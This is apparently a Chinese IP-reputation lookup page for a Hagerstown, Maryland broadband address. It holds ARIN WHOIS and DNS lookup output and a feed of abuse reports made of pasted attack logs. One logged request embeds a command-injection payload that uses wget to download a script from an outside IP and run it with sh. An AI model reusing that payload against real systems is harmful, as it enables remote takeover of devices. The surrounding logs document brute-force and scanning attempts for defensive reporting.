必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): Hagerstown

省份(region): Maryland

国家(country): United States

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2026, American Registry for Internet Numbers, Ltd.
#



# start

NetRange:       24.49.32.0 - 24.49.63.255
CIDR:           24.49.32.0/19
NetName:        ANTIETAM-BLK-V
NetHandle:      NET-24-49-32-0-1
Parent:         NET24 (NET-24-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       
Organization:   Antietam Broadband (ANTM)
RegDate:        2009-07-21
Updated:        2012-03-02
Ref:            https://rdap.arin.net/registry/ip/24.49.32.0


OrgName:        Antietam Broadband
OrgId:          ANTM
Address:        1000 Willow Circle
City:           Hagerstown
StateProv:      MD
PostalCode:     21740
Country:        US
RegDate:        
Updated:        2025-09-15
Ref:            https://rdap.arin.net/registry/entity/ANTM


OrgTechHandle: NOC32723-ARIN
OrgTechName:   NOC
OrgTechPhone:  +1-301-797-5000 
OrgTechEmail:  noc@schurz.com
OrgTechRef:    https://rdap.arin.net/registry/entity/NOC32723-ARIN

OrgAbuseHandle: ABUSE6425-ARIN
OrgAbuseName:   Abuse
OrgAbusePhone:  +1-301-797-5000 
OrgAbuseEmail:  abuse@myactv.net
OrgAbuseRef:    https://rdap.arin.net/registry/entity/ABUSE6425-ARIN

OrgTechHandle: ADMIN9132-ARIN
OrgTechName:   Admin
OrgTechPhone:  +1-301-797-5000 
OrgTechEmail:  jkatchmar@antietambroadband.com
OrgTechRef:    https://rdap.arin.net/registry/entity/ADMIN9132-ARIN

# end


# start

NetRange:       24.49.32.0 - 24.49.35.255
CIDR:           24.49.32.0/22
NetName:        WASHCO-29
NetHandle:      NET-24-49-32-0-2
Parent:         ANTIETAM-BLK-V (NET-24-49-32-0-1)
NetType:        Reassigned
OriginAS:       
Customer:       Antietam Cable Television, Inc (C02286967)
RegDate:        2009-08-03
Updated:        2009-08-03
Ref:            https://rdap.arin.net/registry/ip/24.49.32.0


CustName:       Antietam Cable Television, Inc
Address:        1000 Willow Circle
City:           Hagerstown
StateProv:      MD
PostalCode:     21740
Country:        US
RegDate:        2009-08-03
Updated:        2011-03-19
Ref:            https://rdap.arin.net/registry/entity/C02286967

OrgTechHandle: NOC32723-ARIN
OrgTechName:   NOC
OrgTechPhone:  +1-301-797-5000 
OrgTechEmail:  noc@schurz.com
OrgTechRef:    https://rdap.arin.net/registry/entity/NOC32723-ARIN

OrgAbuseHandle: ABUSE6425-ARIN
OrgAbuseName:   Abuse
OrgAbusePhone:  +1-301-797-5000 
OrgAbuseEmail:  abuse@myactv.net
OrgAbuseRef:    https://rdap.arin.net/registry/entity/ABUSE6425-ARIN

OrgTechHandle: ADMIN9132-ARIN
OrgTechName:   Admin
OrgTechPhone:  +1-301-797-5000 
OrgTechEmail:  jkatchmar@antietambroadband.com
OrgTechRef:    https://rdap.arin.net/registry/entity/ADMIN9132-ARIN

# end



#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2026, American Registry for Internet Numbers, Ltd.
#
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 24.49.32.101
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 32546
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;24.49.32.101.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2026042601 1800 900 604800 86400

;; Query time: 6 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Apr 27 13:31:31 CST 2026
;; MSG SIZE  rcvd: 105
HOST信息:
101.32.49.24.in-addr.arpa domain name pointer dyn-24-49-32-101.myactv.net.
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
101.32.49.24.in-addr.arpa	name = dyn-24-49-32-101.myactv.net.

Authoritative answers can be found from:
相关IP信息:
最新评论:
IP 类型 评论内容 时间
5.62.41.134 attack
\[2019-08-06 22:03:54\] NOTICE\[2288\] chan_sip.c: Registration from '\' failed for '5.62.41.134:1096' - Wrong password
\[2019-08-06 22:03:54\] SECURITY\[2326\] res_security_log.c: SecurityEvent="InvalidPassword",EventTV="2019-08-06T22:03:54.985-0400",Severity="Error",Service="SIP",EventVersion="2",AccountID="72478",SessionID="0x7ff4d0160998",LocalAddress="IPV4/UDP/192.168.244.6/5060",RemoteAddress="IPV4/UDP/5.62.41.134/50042",Challenge="158fee01",ReceivedChallenge="158fee01",ReceivedHash="17737d10c021f4ef7c65986fdf0d16b2"
\[2019-08-06 22:04:34\] NOTICE\[2288\] chan_sip.c: Registration from '\' failed for '5.62.41.134:1010' - Wrong password
\[2019-08-06 22:04:34\] SECURITY\[2326\] res_security_log.c: SecurityEvent="InvalidPassword",EventTV="2019-08-06T22:04:34.705-0400",Severity="Error",Service="SIP",EventVersion="2",AccountID="78334",SessionID="0x7ff4d0348688",LocalAddress="IPV4/UDP/192.168.244.6/5060",RemoteAddress="IPV4/UDP/5.62.41.134/6
2019-08-07 10:06:05
107.131.222.116 attackbotsspam
107.131.222.116 - - \[07/Aug/2019:01:13:23 +0200\] "GET /login.cgi\?cli=aa%20aa%27\;wget%20http://158.255.5.216/t%20-O%20-%3E%20/tmp/t\;sh%20/tmp/t%27$ HTTP/1.1" 400 173 "-" "Hello, World"
...
2019-08-07 09:36:05
159.203.177.53 attackspam
2019-08-07T01:37:35.186040abusebot-8.cloudsearch.cf sshd\[8222\]: Invalid user abuse from 159.203.177.53 port 53962
2019-08-07 09:50:19
200.23.234.203 attackspam
failed_logins
2019-08-07 10:16:55
202.139.192.49 attack
1434/udp
[2019-08-06]1pkt
2019-08-07 10:06:55
218.102.211.235 attackspam
Aug  6 23:54:07 *** sshd[26473]: Invalid user ub from 218.102.211.235
2019-08-07 09:49:06
5.39.79.48 attackspam
Aug  7 03:48:43 mout sshd[21566]: Invalid user redmine from 5.39.79.48 port 59108
2019-08-07 09:54:20
92.63.194.26 attackspam
Aug  7 03:29:36 ArkNodeAT sshd\[9739\]: Invalid user admin from 92.63.194.26
Aug  7 03:29:36 ArkNodeAT sshd\[9739\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=92.63.194.26
Aug  7 03:29:38 ArkNodeAT sshd\[9739\]: Failed password for invalid user admin from 92.63.194.26 port 58192 ssh2
2019-08-07 09:38:46
81.12.13.169 attackspambots
Aug  6 22:35:01 vtv3 sshd\[12760\]: Invalid user ftp2 from 81.12.13.169 port 57062
Aug  6 22:35:01 vtv3 sshd\[12760\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=81.12.13.169
Aug  6 22:35:03 vtv3 sshd\[12760\]: Failed password for invalid user ftp2 from 81.12.13.169 port 57062 ssh2
Aug  6 22:39:18 vtv3 sshd\[15191\]: Invalid user robyn from 81.12.13.169 port 44444
Aug  6 22:39:18 vtv3 sshd\[15191\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=81.12.13.169
Aug  6 22:51:39 vtv3 sshd\[21832\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=81.12.13.169  user=root
Aug  6 22:51:41 vtv3 sshd\[21832\]: Failed password for root from 81.12.13.169 port 34898 ssh2
Aug  6 22:55:56 vtv3 sshd\[23890\]: Invalid user viet from 81.12.13.169 port 50640
Aug  6 22:55:56 vtv3 sshd\[23890\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=81.12.13.169
2019-08-07 09:52:40
212.21.66.6 attack
2019-07-09T10:27:13.635587wiz-ks3 sshd[27644]: Invalid user admin from 212.21.66.6 port 11794
2019-07-09T10:27:13.637630wiz-ks3 sshd[27644]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=tor-exit-4.all.de
2019-07-09T10:27:13.635587wiz-ks3 sshd[27644]: Invalid user admin from 212.21.66.6 port 11794
2019-07-09T10:27:15.994864wiz-ks3 sshd[27644]: Failed password for invalid user admin from 212.21.66.6 port 11794 ssh2
2019-07-09T10:27:13.637630wiz-ks3 sshd[27644]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=tor-exit-4.all.de
2019-07-09T10:27:13.635587wiz-ks3 sshd[27644]: Invalid user admin from 212.21.66.6 port 11794
2019-07-09T10:27:15.994864wiz-ks3 sshd[27644]: Failed password for invalid user admin from 212.21.66.6 port 11794 ssh2
2019-07-09T10:27:18.271976wiz-ks3 sshd[27644]: Failed password for invalid user admin from 212.21.66.6 port 11794 ssh2
2019-07-09T10:27:13.637630wiz-ks3 sshd[27644]: pam_unix(sshd:auth): authenticat
2019-08-07 09:51:22
109.195.160.133 attack
445/tcp 445/tcp 445/tcp...
[2019-06-07/08-06]14pkt,1pt.(tcp)
2019-08-07 09:39:05
219.155.170.107 attackbots
2323/tcp
[2019-08-06]1pkt
2019-08-07 10:03:29
49.83.142.191 attack
23/tcp
[2019-08-06]1pkt
2019-08-07 10:10:05
217.69.168.232 attackspambots
445/tcp 445/tcp 445/tcp...
[2019-06-18/08-06]10pkt,1pt.(tcp)
2019-08-07 09:46:59
1.32.198.165 attackspam
445/tcp 445/tcp 445/tcp...
[2019-06-06/08-06]17pkt,1pt.(tcp)
2019-08-07 09:34:56

最近上报的IP列表

2606:4700:10::6816:59 18.162.112.93 150.67.140.151 122.193.247.184
2606:4700:10::6816:1303 141.131.1.52 92.142.11.188 45.239.141.244
190.60.36.9 172.1.179.116 223.199.182.20 171.37.191.3
2606:4700:10::ac43:2801 2606:4700:10::6814:9763 2606:4700:10::6816:454d 2606:4700:10::6814:6542
3.90.228.3 2606:4700:10::6816:3868 2606:4700:10::6816:4799 115.78.183.90